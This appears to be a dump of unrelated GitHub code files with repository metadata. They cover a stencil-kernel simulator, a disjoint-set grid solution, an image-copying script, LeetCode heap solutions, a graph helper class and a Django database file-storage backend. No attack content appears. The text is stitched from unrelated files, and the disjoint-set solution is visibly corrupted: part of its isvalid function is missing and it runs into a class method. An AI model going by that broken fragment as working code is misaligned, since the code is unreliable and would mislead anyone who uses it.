Iterate through the computation tree in order to generate the kernel string (according to some properties\n e.g. 
relative to center or replace negative index.\n :param node: current node in the tree\n :param index_relative_to_center: indication whether the zero index should be at the center of the stencil or the\n furthest element\n :param replace_negative_index: replace the negative sign '-' by n in order to create variable names that are not\n being split up by the python expression parser (Calculator)\n :return: computation string of the subgraph\n \"\"\"\n # get predecessor list\n pred = list(self.graph.graph.pred[node])\n # differentiate cases for each node type\n if isinstance(node, BinOp): # binary operation\n # extract expression elements\n if len(pred) == 1: # lhs == rhs:\n lhs, rhs = pred[0], pred[0]\n else:\n lhs = pred[0] # left hand side\n rhs = pred[1] # right hand side\n # recursively compute the child string\n lhs_str = self.iter_comp_tree(lhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n rhs_str = self.iter_comp_tree(rhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n # return formatted string\n return \"({} {} {})\".format(lhs_str, node.generate_op_sym(), rhs_str)\n elif isinstance(node, Call): # function call\n # extract expression element\n expr = pred[0]\n # recursively compute the child string\n expr_str = self.iter_comp_tree(expr, index_relative_to_center,\n replace_negative_index,\n python_syntax)\n # return formatted string\n return \"{}({})\".format(node.name, expr_str)\n elif isinstance(node, Name) or isinstance(node, Num):\n # return formatted string\n return str(node.name) # variable name\n elif isinstance(node, Subscript):\n # compute correct indexing according to the flag\n if index_relative_to_center:\n dim_index = node.index\n else:\n dim_index = stencilflow.list_subtract_cwise(\n node.index, self.graph.max_index[node.name])\n # break down index from 3D (i.e. 
[X,Y,Z]) to 1D\n if flatten_index:\n # TODO\n if node.name in self.input_paths and self.inputs[\n node.name][\"input_dims\"] is not None:\n ind = [\n x if x in self.inputs[node.name][\"input_dims\"] else None\n for x in stencilflow.ITERATORS\n ]\n num_dim = stencilflow.num_dims(ind)\n #dim_index = dim_index[len(self.dimensions) - num_dim:]\n new_ind, i = list(), 0\n for entry in ind:\n if entry is None:\n new_ind.append(None)\n else:\n new_ind.append(dim_index[i])\n i += 1\n dim_index = dim_index #list(map(lambda x, y: y if x is not None else None, ind, new_ind))\n word_index = stencilflow.convert_3d_to_1d(\n dimensions=self.dimensions, index=dim_index)\n # replace negative sign if the flag is set\n if replace_negative_index and word_index < 0:\n return node.name + \"[\" + \"n\" + str(abs(word_index)) + \"]\"\n else:\n return node.name + \"[\" + str(word_index) + \"]\"\n else:\n try:\n dim_index = [\n dim_index[stencilflow.ITERATORS.index(i)]\n for i in self.inputs[node.name][\"input_dims\"]\n ]\n except (KeyError, TypeError):\n pass # input_dim not defined or is None\n if len(dim_index) > output_dimensions:\n for i in range(3 - output_dimensions):\n if dim_index[i] != 0:\n raise ValueError(\"Removed used index dimension\")\n dim_index = dim_index[3 - output_dimensions:]\n return node.name + str(dim_index)\n elif isinstance(\n node, Ternary\n ): # ternary operator of the form true_expr if comp else false_expr\n # extract expression elements\n compare = [x for x in pred if type(x) == Compare][0] # comparison\n lhs = [x for x in pred if type(x) != Compare][0] # left hand side\n rhs = [x for x in pred if type(x) != Compare][1] # right hand side\n # recursively compute the child string\n compare_str = self.iter_comp_tree(compare, index_relative_to_center,\n replace_negative_index,\n python_syntax, flatten_index,\n output_dimensions)\n lhs_str = self.iter_comp_tree(lhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n rhs_str = self.iter_comp_tree(rhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n # return formatted string\n if python_syntax:\n return \"(({}) if ({}) else ({}))\".format(\n lhs_str, compare_str, rhs_str)\n else: # C++ ternary operator syntax\n return \"(({}) ? ({}) : ({}))\".format(compare_str, lhs_str,\n rhs_str)\n elif isinstance(node, Compare): # comparison\n # extract expression element\n lhs = pred[0]\n rhs = pred[1]\n # recursively compute the child string\n lhs_str = self.iter_comp_tree(lhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n rhs_str = self.iter_comp_tree(rhs, index_relative_to_center,\n replace_negative_index, python_syntax,\n flatten_index, output_dimensions)\n # return formatted string\n return \"{} {} {}\".format(lhs_str, str(node.name), rhs_str)\n elif isinstance(node, UnaryOp): # unary operations e.g. 
negation\n # extract expression element\n expr = pred[0]\n # recursively compute the child string\n expr_str = self.iter_comp_tree(\n node=expr,\n index_relative_to_center=index_relative_to_center,\n replace_negative_index=replace_negative_index,\n python_syntax=python_syntax,\n flatten_index=flatten_index,\n output_dimensions=output_dimensions)\n # return formatted string\n return \"({}{})\".format(node.generate_op_sym(), expr_str)\n else:\n raise NotImplementedError(\n \"iter_comp_tree is not implemented for node type {}\".format(\n type(node)))\n\n def generate_relative_access_kernel_string(self,\n relative_to_center=True,\n replace_negative_index=False,\n python_syntax=False,\n flatten_index=True,\n output_dimensions=None) -> str:\n \"\"\"\n Generates the relative (either to the center or to the furthest field access) access kernel string which\n is necessary for the code generator HLS tool.\n :param relative_to_center: if true, the center is at zero, otherwise the furthest access is at zero\n :param replace_negative_index: if true, all negative access signs e.g. arrA_-20 get replaced by n e.g.\n arrA_n20 in order to be correctly recognised as a single variable name.\n :return: the generated relative access kernel string\n \"\"\"\n # format: 'output = vdc[index1] + vout[index2]'\n res = []\n # treat named nodes\n for n in self.graph.graph.nodes:\n if isinstance(n, Name) and n.name not in self.input_paths:\n if len(self.graph.graph.pred[n]) == 0:\n # This has no inputs, and must be a constant\n continue\n res.append(n.name + \" = \" + self.iter_comp_tree(\n list(self.graph.graph.pred[n])[0], relative_to_center,\n replace_negative_index, python_syntax, flatten_index,\n output_dimensions))\n # treat output node(s)\n output_node = [\n n for n in self.graph.graph.nodes if isinstance(n, Output)\n ]\n if len(output_node) != 1:\n raise Exception(\"Expected a single output node\")\n output_node = output_node[0]\n # concatenate the expressions\n res.append(self.name + \" = \" + self.iter_comp_tree(\n node=list(self.graph.graph.pred[output_node])[0],\n index_relative_to_center=relative_to_center,\n replace_negative_index=replace_negative_index,\n python_syntax=python_syntax,\n flatten_index=flatten_index,\n output_dimensions=output_dimensions))\n return \"; \".join(res)\n\n def reset_old_compute_state(self) -> None:\n \"\"\"\n Reset the internal kernel simulator state in order to be prepared for the next iteration.\n \"\"\"\n self.var_map = dict()\n self.read_success = False\n self.exec_success = False\n self.result = None\n\n def remove_duplicate_accesses(self, inp: List) -> List:\n \"\"\"\n Remove duplicate accesses of the given input array.\n :param inp: List with duplicates.\n :return: List without duplicates.\n \"\"\"\n tuple_set = set(tuple(row) for row in inp)\n return [list(t) for t in tuple_set]\n\n def setup_internal_buffers(self) -> None:\n \"\"\"\n Create and split the internal buffers according to the pipeline model (see paper example ref# TODO)\n :return:\n \"\"\"\n # remove duplicate accesses\n for item in self.graph.accesses:\n self.graph.accesses[item] = self.remove_duplicate_accesses(\n self.graph.accesses[item])\n # slice the internal buffer into chunks of accesses\n for buf_name in self.graph.buffer_size:\n # create empty list and sort the accesses according to their relative position\n self.internal_buffer[buf_name]: List[BoundedQueue] = list()\n list.sort(self.graph.accesses[buf_name], reverse=True)\n # split according to the cases\n if len(self.graph.accesses[buf_name]) == 
0: # empty list\n pass\n elif len(self.graph.accesses[buf_name]) == 1: # single entry list\n # this line would add an additional internal buffer for fields that only have a single access\n self.internal_buffer[buf_name].append(\n BoundedQueue(name=buf_name, maxsize=1, collection=[None]))\n else: # many entry list\n # iterate through all of them and split them into correct sizes\n itr = self.graph.accesses[buf_name].__iter__()\n pre = itr.__next__()\n for item in itr:\n curr = item\n # calculate size of buffer\n diff = abs(\n stencilflow.convert_3d_to_1d(\n index=stencilflow.list_subtract_cwise(pre, curr),\n dimensions=self.dimensions))\n if diff == 0: # two accesses on same field\n pass\n else:\n self.internal_buffer[buf_name].append(\n BoundedQueue(name=buf_name,\n maxsize=diff,\n collection=[None] * diff))\n pre = curr\n\n def buffer_position(self, access: BaseKernelNodeClass) -> int:\n \"\"\"\n Computes the offset position within the buffer list\n :param access: the access index we want to know the buffer position\n :return: the offset from the access\n \"\"\"\n return self.convert_3d_to_1d(\n self.graph.min_index[access.name]) - self.convert_3d_to_1d(\n access.index)\n\n def index_to_ijk(self, index: List[int]):\n \"\"\"\n Creates a string of the access (for variable name generation).\n :param index: access\n :return: created string\n \"\"\"\n # current implementation only supports 3 dimension (default)\n if len(index) == 3:\n \"\"\"\n # v1:\n return \"[i{},j{},k{}]\".format(\n \"\" if index[0] == 0 else \"+{}\".format(index[0]),\n \"\" if index[1] == 0 else \"+{}\".format(index[1]),\n \"\" if index[2] == 0 else \"+{}\".format(index[2])\n )\n # v2:\n return \"_{}_{}_{}\".format(index[0], index[1], index[2])\n \"\"\"\n # compute absolute index\n ind = stencilflow.convert_3d_to_1d(dimensions=self.dimensions,\n index=index)\n # return formatted string\n return \"_{}\".format(ind) if ind >= 0 else \"_n{}\".format(abs(ind))\n else:\n raise NotImplementedError(\n \"Method index_to_ijk has not been implemented for |indices|!=3, here: |indices|={}\"\n .format(len(index)))\n\n def buffer_number(self, node: Subscript):\n \"\"\"\n Computes the index within the internal buffer array for accessing the input node.\n :param node: input node\n :return: index (-1: delay buffer, >= 0: internal buffer index)\n \"\"\"\n # select all matching inputs\n selected = [x.index for x in self.graph.inputs if x.name == node.name]\n # remove duplicates\n selected_unique = self.remove_duplicate_accesses(selected)\n # sort them to have them ordered by the access\n ordered = sorted(selected_unique, reverse=True)\n # get the position within the sorted list\n result = ordered.index(node.index)\n return result - 1\n\n def get_global_kernel_index(self) -> List[int]:\n \"\"\"\n Return the current position (simulator, program counter) within the comutation as a list of the form\n [i,j,k].\n :return: current global kernel position as [i,j,k]\n \"\"\"\n # get dimensions and PC\n index = self.dimensions\n number = self.program_counter\n # convert the absolute value (PC) to its corresponding position in the given 3D space.\n n = len(index)\n all_dim = functools.reduce(operator.mul, index,\n 1) // index[0] # integer arithmetic\n output = list()\n for i in range(1, n + 1):\n output.append(number // all_dim)\n number -= output[-1] * all_dim\n if i < n:\n all_dim = all_dim // index[i]\n return output\n\n def is_out_of_bound(self, index: List[int]) -> bool:\n \"\"\"\n Checks whether the current access is within bounds or not.\n 
:param index: access index\n :return: true: out of bounds, false: otherwise\n \"\"\"\n # check all dimensions boundary\n for i in range(len(index)):\n if index[i] < 0 or index[i] >= self.dimensions[i]:\n return True\n return False\n\n def get_data(self, inp: Subscript, global_index: List[int],\n relative_index: List[int]):\n \"\"\"\n Returns data of current stencil access (could be real data or boundary condition)\n :param inp: array field access\n :param global_index: center location of current stencil\n :param relative_index: offset from center of stencil\n :return: data\n \"\"\"\n # get the access index\n access_index = stencilflow.list_add_cwise(global_index, relative_index)\n \"\"\"\n Boundary Condition\n \"\"\"\n # check if it is within bounds\n if self.is_out_of_bound(access_index):\n if self.boundary_conditions[inp.name][\"type\"] == \"constant\":\n return self.boundary_conditions[inp.name][\"value\"]\n elif self.boundary_conditions[inp.name][\"type\"] == \"copy\":\n raise NotImplementedError(\n \"Copy boundary conditions have not been implemented yet.\")\n else:\n raise NotImplementedError(\n \"We currently do not support boundary conditions of type {}\"\n .format(self.boundary_conditions[inp.name][\"type\"]))\n \"\"\"\n Data Access\n \"\"\"\n # get index position within the buffers\n pos = self.buffer_number(inp)\n if pos == -1: # delay buffer\n return self.inputs[inp.name][\"delay_buffer\"].try_peek_last()\n elif pos >= 0: # internal buffer\n return self.inputs[inp.name][\"internal_buffer\"][pos].try_peek_last()\n\n def test_availability(self):\n \"\"\"\n Check if all accesses are available (=> ready for execution). In addition to that, the method delivers all\n accesses that are not available yet.\n :return: true: all available, false: otherwise\n \"\"\"\n # set initial value and init set\n all_available = True\n self.not_available = set()\n # iterate through all inputs\n for inp in self.graph.inputs:\n # case split for types\n if isinstance(inp, Num): # numerals are always available\n pass\n elif len(self.inputs[inp.name]\n ['internal_buffer']) == 0: # no internal buffer\n pass\n elif isinstance(inp, Subscript): # normal subscript access\n # get current internal state position in [i,j,k] format\n gki = self.get_global_kernel_index()\n # check bound, out of bound is handled by the boundary condition automatically (always available for\n # constant)\n if self.is_out_of_bound(\n stencilflow.list_add_cwise(inp.index, gki)):\n pass\n else: # within bounds\n # get position and check if the value (not None) is available\n index = self.buffer_number(inp)\n if index == -1: # delay buffer\n if self.inputs[inp.name]['delay_buffer'].try_peek_last() is None or \\\n self.inputs[inp.name]['delay_buffer'].try_peek_last() is False:\n all_available = False\n self.not_available.add(inp.name)\n elif 0 <= index < len(self.inputs[\n inp.name]['internal_buffer']): # internal buffer\n if self.inputs[inp.name]['internal_buffer'][index].try_peek_last() is False \\\n or self.inputs[inp.name]['internal_buffer'][index].try_peek_last() is None:\n all_available = False\n self.not_available.add(inp.name)\n else:\n raise Exception(\"index out of bound: {}\".format(index))\n\n return all_available\n\n def move_forward(self, items: Dict[str, Dict]) -> None:\n \"\"\"\n Move all items within the internal and delay buffer one element forward.\n :param items:\n :return:\n \"\"\"\n # move all forward\n for name in items:\n if len(items[name]['internal_buffer']) == 0: # no internal buffer\n pass\n elif 
len(self.inputs[name]\n ['internal_buffer']) == 1: # single internal buffer\n items[name]['internal_buffer'][0].dequeue()\n items[name]['internal_buffer'][0].enqueue(\n items[name]['delay_buffer'].dequeue())\n else: # many internal buffers\n # iterate over them and move all one forward\n index = len(items[name]['internal_buffer']) - 1\n pre = items[name]['internal_buffer'][index - 1]\n next = items[name]['internal_buffer'][index]\n next.dequeue()\n while index > 0:\n next.enqueue(pre.dequeue())\n next = pre\n index -= 1\n pre = items[name]['internal_buffer'][index - 1]\n items[name]['internal_buffer'][0].enqueue(\n items[name]['delay_buffer'].dequeue())\n\n def decrement_center_reached(self):\n \"\"\"\n Decrement counter for reaching the center. As soon as this counter reaches zero, the computed output values\n are valid and should be forwarded to the successors channels.\n \"\"\"\n # decrement all\n for item in self.dist_to_center:\n if self.inputs[item]['delay_buffer'].try_peek_last() is not None:\n self.dist_to_center[item] -= 1\n\n def try_read(self) -> bool:\n \"\"\"\n This is the implementation of the kernel reading functionality of the simulator. It tries to read from all\n input channels and indicates if this has been done with success.\n \"\"\"\n # check if all inputs are available\n self.all_available = self.test_availability()\n # get all values and put them into the variable map\n if self.all_available:\n for inp in self.graph.inputs:\n # read inputs into var_map\n if isinstance(inp, Num): # case numerals\n self.var_map[inp.name] = float(inp.name)\n elif isinstance(inp, Name): # case variable names\n # get value from internal_buffer\n try:\n # check for duplicate\n if not self.var_map.__contains__(inp.name):\n self.var_map[inp.name] = self.internal_buffer[\n inp.name].peek(self.buffer_position(inp))\n except Exception as ex: # do proper diagnosis\n self.diagnostics(ex)\n elif isinstance(inp, Subscript): # case array accesses\n # get value from internal buffer\n try:\n name = inp.name + self.index_to_ijk(inp.index)\n if not self.var_map.__contains__(name):\n self.var_map[name] = self.get_data(\n inp=inp,\n global_index=self.get_global_kernel_index(),\n relative_index=inp.index)\n except Exception as ex: # do proper diagnosis\n self.diagnostics(ex)\n # set kernel flag indicating the the read has been successful\n self.read_success = self.all_available\n # test center reached\n self.decrement_center_reached()\n self.center_reached = True\n for item in self.dist_to_center:\n if self.dist_to_center[item] >= 0:\n self.center_reached = False\n # either move all inputs forward or those that are not available yet\n if self.center_reached:\n if self.all_available:\n self.move_forward(self.inputs)\n else:\n not_avail_dict = dict()\n for item in self.not_available:\n not_avail_dict[item] = self.inputs[item]\n self.move_forward(not_avail_dict)\n else:\n not_reached_dict = dict()\n for item in self.dist_to_center:\n if self.dist_to_center[item] >= 0:\n not_reached_dict[item] = self.inputs[item]\n self.move_forward(not_reached_dict)\n return self.all_available\n\n def try_execute(self):\n \"\"\"\n This is the implementation of the kernel execution functionality of the simulator. 
It executes the stencil\n computation for the current variable mapping that was set up by the try_read() function.\n \"\"\"\n # check if read has been succeeded\n if self.center_reached and self.read_success and 0 <= self.program_counter < functools.reduce(\n operator.mul, self.dimensions, 1):\n # execute calculation\n try:\n # get computation string\n computation = self.generate_relative_access_kernel_string(relative_to_center=True,\n replace_negative_index=True,\n python_syntax=True) \\\n .replace(\"[\", \"_\").replace(\"]\", \"\").replace(\" \", \"\")\n # compute result and\n self.result = self.data_type(\n self.calculator.eval_expr(self.var_map, computation))\n # write result to latency-simulating buffer\n self.out_delay_queue.enqueue(self.result)\n # update performance metric\n self.PC_exec_start = min(self.PC_exec_start,\n self.program_counter)\n self.PC_exec_end = max(self.PC_exec_end, self.program_counter)\n # increment the program counter\n self.program_counter += 1\n except Exception as ex: # do proper diagnosis upon an exception\n self.diagnostics(ex)\n else:\n # write bubble to latency-simulating buffer\n self.out_delay_queue.enqueue(None)\n\n def try_write(self):\n \"\"\"\n This is the implementation of the kernel write functionality of the simulator. It writes the output element to\n its successor channels.\n \"\"\"\n # read last element of the delay queue\n data = self.out_delay_queue.dequeue()\n # write result to all output queues\n for outp in self.outputs:\n try:\n self.outputs[outp][\"delay_buffer\"].enqueue(\n data) # use delay buffer to be consistent with others,\n # delay buffer is used to write to the output data queue here\n except Exception as ex: # do proper diagnosis upon an exception\n self.diagnostics(ex)\n\n def diagnostics(self, ex: Exception) -> None:\n \"\"\"\n Interface for error overview reporting (gets called in case of an exception)\n\n - goal:\n - get an overview over the whole stencil chain state in case of an error\n - maximal and current size of all buffers\n - type of phase (saturation/execution)\n - efficiency (#execution cycles / #total cycles)\n :param ex: the exception that arose\n \"\"\"\n print(\"#####################################\")\n print(\"Diagnosis output of kernel {}\".format(self.name))\n print(\"Program Counter: {}\".format(self.program_counter))\n print(\"All inputs available? {}\".format(self.all_available))\n print(\"Center reached? 
{}\".format(self.center_reached))\n print(\"Exception traceback:\")\n if ex is not None:\n import traceback\n try:\n raise ex\n except Exception:\n print(traceback.format_exc()) # inputs\n for input in self.inputs:\n buffer = self.inputs[input]\n print(\"Buffer info from input {}\".format(input))\n # delay buffer\n print(\"Delay buffer max size: {}, current size: {}\".format(\n buffer['delay_buffer'].maxsize, buffer['delay_buffer'].size()))\n print(\"Delay buffer data: {}\".format(buffer['delay_buffer'].queue))\n # internal buffer\n data = list(map(lambda x: x.queue, buffer['internal_buffer']))\n print(\"Internal buffer data: {}\".format(data))\n # latency sim buffer\n print(\"Latency simulation buffer data: {}\".format(\n self.out_delay_queue.queue))\n # output\n for output in self.outputs:\n buffer = self.outputs[output]\n print(\"Buffer info from output {}\".format(output))\n # delay buffer\n print(\"Delay buffer max size: {}, current size: {}\".format(\n buffer['delay_buffer'].maxsize, buffer['delay_buffer'].size()))\n print(\"Delay buffer data: {}\".format(buffer['delay_buffer'].queue))\n # internal buffer\n data = list(map(lambda x: x.queue, buffer['internal_buffer']))\n print(\"Internal buffer data: {}\".format(data))\n\n\nif __name__ == \"__main__\":\n \"\"\"\n simple test kernel for debugging\n \"\"\"\n # global dimensions\n dim = [100, 100, 100]\n # instantiate kernel\n kernel = Kernel(\n name=\"b\",\n kernel_string=\n \"b = a[i+1,j+1,k+1] + a[i+1,j,k] + a[i-1,j-1,k-1] + a[i+1,j+1,k] + (-a[i,j,k])\",\n dimensions=dim,\n boundary_conditions={\"a\": {\n \"type\": \"constant\",\n \"value\": 0.0\n }},\n data_type=dace.dtypes.float64)\n print(\"Kernel string conversion:\")\n print(\"dimensions are: {}\".format(dim))\n print(kernel.kernel_string)\n print(\n kernel.generate_relative_access_kernel_string(relative_to_center=False))\n print()\n","repo_name":"spcl/stencilflow","sub_path":"stencilflow/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":38842,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"17088868885","text":"from typing import List\nclass DisjointSet:\n def __init__(self, n):\n self.rank = [0]*(n+1)\n self.size = [1]*(n+1)\n self.parent = [i for i in range(n+1)]\n \n def find(self, node):\n if node == self.parent[node]:\n return node\n self.parent[node] = self.find(self.parent[node])\n return self.parent[node]\n \n def unionSize(self, u, v):\n paru = self.find(u)\n parv = self.find(v)\n \n if paru == parv:\n return\n \n if self.size[paru] < self.size[parv]:\n self.parent[paru] = parv\n self.size[parv] += self.size[paru]\n else:\n self.parent[parv] = paru\n self.size[paru] += self.size[parv]\n\nclass Solution:\n def MaxConnection(self, grid : List[List[int]]) -> int:\n def isvalid(p, q):\n return 0<=p None:\n pass\n def Input(self,n,m):\n matrix=[]\n #matrix input\n for _ in range(n):\n matrix.append([int(i) for i in input().strip().split()])\n return matrix\n def Print(self,arr):\n for i in arr:\n for j in i:\n print(j,end=\" \")\n print()\n\n\nif __name__==\"__main__\":\n t = int(input())\n for _ in range(t):\n \n n = int(input())\n \n \n grid=IntMatrix().Input(n, n)\n \n obj = Solution()\n res = obj.MaxConnection(grid)\n \n print(res)\n \n\n# } Driver Code Ends","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"Maximum Connected group - 
GFG/maximum-connected-group.py","file_name":"maximum-connected-group.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4337798046","text":"import json\nimport os\nimport shutil\n\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\n\ndef copy300times(dir, imgs):\n for i in range(450, 700):\n destination = dir + \"\\\\\" + str(i) + \".jpg\"\n shutil.copy(imgs, destination)\n\n\nif __name__ == '__main__':\n\n root_path = \"D:\\\\LOL_DATA\\\\avatar_en\"\n for directory in os.listdir(root_path):\n for imgs in os.listdir(root_path + \"\\\\\" + directory):\n copy300times(root_path + \"\\\\\" + directory,\n root_path + \"\\\\\" + directory + \"\\\\\" + imgs)\n","repo_name":"AaronYang2333/LOL_Overlay_Assistant_Tool","sub_path":"gen_pics/copy_300_pic.py","file_name":"copy_300_pic.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"37"} +{"seq_id":"4367891167","text":"# leetcode submit region begin(Prohibit modification and deletion)\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n # 二分\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n def canAchieve(index: int) -> bool:\n deltas = []\n t = bricks\n for i in range(index):\n if heights[i] < heights[i + 1]:\n heapq.heappush(deltas, -(heights[i + 1] - heights[i]))\n for i in range(ladders):\n if deltas:\n heapq.heappop(deltas)\n for i in deltas:\n t += i\n if t < 0:\n return False\n return True\n\n left, right = 0, len(heights) - 1\n while left <= right:\n mid = (left + right) // 2\n if canAchieve(mid):\n left = mid + 1\n else:\n right = mid - 1\n return right\n\n # 贪心\n def furthestBuilding2(self, heights: List[int], bricks: int, ladders: int) -> int:\n n = len(heights)\n pq = []\n for i in range(n - 1):\n if heights[i] < heights[i + 1]:\n heapq.heappush(pq, (heights[i + 1] - heights[i]))\n if len(pq) > ladders:\n bricks -= heapq.heappop(pq)\n if bricks < 0:\n return i\n return n - 1\n\n\n# leetcode submit region end(Prohibit modification and deletion)\nprint(Solution().furthestBuilding2([4, 2, 7, 6, 9, 14, 12], 5, 1) == 4)\nprint(Solution().furthestBuilding([4, 12, 2, 7, 3, 18, 20, 3, 19], 10, 2) == 7)\nprint(Solution().furthestBuilding([14, 3, 19, 3], 17, 0) == 3)\nprint(Solution().furthestBuilding([1, 5, 1, 2, 3, 4, 10000], 4, 1) == 5)\n","repo_name":"Howloong/Leetcode","sub_path":"python/leetcode/editor/cn/P1642_FurthestBuildingYouCanReach.py","file_name":"P1642_FurthestBuildingYouCanReach.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15810021275","text":"import numpy as np\nimport networkx as nx\n\nfrom basic.util import exclusive_combine\n\n\nclass MyGraph(object):\n def __init__(self, path, edgelist=True):\n self.neighbor_dict = {}\n if edgelist:\n fin = open(path, 'r')\n for l in fin.readlines():\n e = l.split()\n i, j = int(e[0]), int(e[1])\n self.update_edge(i, j)\n self.update_edge(j, i)\n fin.close()\n\n for key in self.neighbor_dict.keys():\n self.neighbor_dict[key] = list(self.neighbor_dict[key])\n\n self.node_list = list(self.neighbor_dict.keys())\n self.node_list.sort()\n self.node_num = len(self.node_list)\n\n def update_edge(self, i, j):\n if i in self.neighbor_dict:\n self.neighbor_dict[i].add(j)\n else:\n 
self.neighbor_dict[i] = {j}\n\n if j in self.neighbor_dict:\n self.neighbor_dict[j].add(i)\n else:\n self.neighbor_dict[j] = {i}\n\n def get_batches(self, batch_size):\n # np.random.seed(1)\n np.random.shuffle(self.node_list)\n num_batches = self.node_num // batch_size\n batch_list = []\n\n for n in range(num_batches):\n batch_list.append(self.node_list[n * batch_size: (n + 1) * batch_size])\n\n if self.node_num > num_batches * batch_size:\n batch_list.append(self.node_list[num_batches * batch_size:])\n\n self.node_list.sort()\n return batch_list\n\n def get_neighbors(self, in_list):\n neighbors = [self.neighbor_dict[i] for i in in_list]\n return exclusive_combine(neighbors)\n\n def diffuse(self, step, nodes):\n cur_list = nodes\n scale_list = [cur_list]\n for s in range(step):\n neighbors = self.get_neighbors(cur_list)\n cur_list = exclusive_combine([cur_list, neighbors])\n scale_list.append(cur_list)\n return scale_list # From now to the past\n\n def statistic(self):\n neigh_num = []\n for n in self.node_list:\n neigh_num.append(len(self.neighbor_dict[n]))\n\n return np.max(neigh_num), np.min(neigh_num), np.mean(neigh_num)\n\nif __name__ == '__main__':\n path = '/home/hezhicheng/data/ne_clean/cora-2211/edges.txt'\n # labels = '/home/hezhicheng/data/ne_clean/cora/labels.txt'\n graph = MyGraph(path)\n\n print(graph.statistic())\n\n\n\n\n","repo_name":"NKU-IIPLab/Net2Net-NE","sub_path":"Net2Net-NE/basic/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"}
+{"seq_id":"3955551738","text":"\"\"\"Custom Django FILE_STORAGE that saves files in the database.\"\"\"\n\n# python\nimport base64\nimport os\n# third party\nfrom django.apps import apps\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import Storage\nfrom django.db.models import BinaryField\nfrom django.utils.crypto import get_random_string\nfrom django.utils.http import urlencode\nfrom django.utils.deconstruct import deconstructible\n# project\nfrom .compat import reverse\n\n\nNAME_FORMAT_HINT = '<app>.<model>/<content_field>/' \\\n '<filename_field>/<mimetype_field>/<filename>'\n\n\nclass NameException(Exception):\n pass\n\n\n@deconstructible\nclass DatabaseFileStorage(Storage):\n \"\"\"File storage system that saves models' FileFields in the database.\n\n Intended for use with Models' FileFields.\n Uses a specific model for each FileField of each Model.\n \"\"\"\n\n def _get_model_cls(self, model_class_path):\n app_label, model_name = model_class_path.rsplit('.', 1)\n return apps.get_model(app_label, model_name)\n\n def _get_encoded_bytes_from_file(self, content_field, _file):\n _file.seek(0)\n file_content = _file.read()\n encoded = base64.b64encode(file_content)\n if isinstance(content_field, BinaryField):\n return encoded\n return encoded.decode('utf-8')\n\n def _get_file_from_encoded_bytes(self, encoded_bytes):\n file_buffer = base64.b64decode(encoded_bytes)\n return ContentFile(file_buffer)\n\n def _get_unique_filename(self, model_cls, filename_field, filename):\n final_name = filename\n\n if ('.' 
in filename.rsplit(os.sep, 1)[-1]):\n stem, extension = final_name.rsplit('.', 1)\n else:\n stem, extension = (final_name, '')\n\n random_str = get_random_string(7)\n while model_cls.objects.filter(\n **{filename_field: final_name}\n ).exists(): # pragma: no cover\n final_name = '%s_(%s)%s' % (\n stem, random_str,\n ('.%s' % extension) if extension else ''\n )\n random_str = get_random_string(7)\n return final_name\n\n def _get_storage_attributes(self, name):\n try:\n (\n model_class_path,\n content_field,\n filename_field,\n mimetype_field,\n filename\n ) = name.split(os.sep)\n except ValueError:\n raise NameException(\n 'Wrong name format. Got {} ; should be {}'.format(\n name, NAME_FORMAT_HINT)\n )\n return {\n 'model_class_path': model_class_path,\n 'content_field': content_field,\n 'filename_field': filename_field,\n 'mimetype_field': mimetype_field,\n 'filename': filename,\n }\n\n def _open(self, name, mode='rb'):\n assert mode[0] in 'rwab'\n\n if os.sep != '/': # Windows fix (see a6d4707) # pragma: no cover\n name = name.replace('/', os.sep)\n\n storage_attrs = self._get_storage_attributes(name)\n model_class_path = storage_attrs['model_class_path']\n content_field = storage_attrs['content_field']\n filename_field = storage_attrs['filename_field']\n mimetype_field = storage_attrs['mimetype_field']\n filename = storage_attrs['filename']\n\n model_cls = self._get_model_cls(model_class_path)\n model_instance = model_cls.objects.only(\n content_field, mimetype_field\n ).get(**{filename_field: name})\n encoded_bytes = getattr(model_instance, content_field)\n\n _file = self._get_file_from_encoded_bytes(encoded_bytes)\n _file.filename = filename\n _file.mimetype = getattr(model_instance, mimetype_field)\n return _file\n\n def _save(self, name, content):\n storage_attrs = self._get_storage_attributes(name)\n model_class_path = storage_attrs['model_class_path']\n content_field_name = storage_attrs['content_field']\n filename_field_name = storage_attrs['filename_field']\n mimetype_field_name = storage_attrs['mimetype_field']\n\n model_cls = self._get_model_cls(model_class_path)\n new_filename = self._get_unique_filename(model_cls, filename_field_name, name)\n\n content_field = model_cls._meta.get_field(content_field_name)\n encoded_bytes = self._get_encoded_bytes_from_file(content_field, content)\n\n mimetype = (\n getattr(content, 'content_type', None) or # Django >= 1.11\n getattr(content.file, 'content_type', None) or # Django < 1.11\n 'text/plain' # Fallback\n )\n\n model_cls.objects.create(**{\n content_field_name: encoded_bytes,\n filename_field_name: new_filename,\n mimetype_field_name: mimetype,\n })\n return new_filename\n\n def delete(self, name):\n if os.sep != '/': # Windows fix (see a6d4707) # pragma: no cover\n name = name.replace('/', os.sep)\n storage_attrs = self._get_storage_attributes(name)\n model_class_path = storage_attrs['model_class_path']\n filename_field = storage_attrs['filename_field']\n\n model_cls = self._get_model_cls(model_class_path)\n model_cls.objects.filter(**{filename_field: 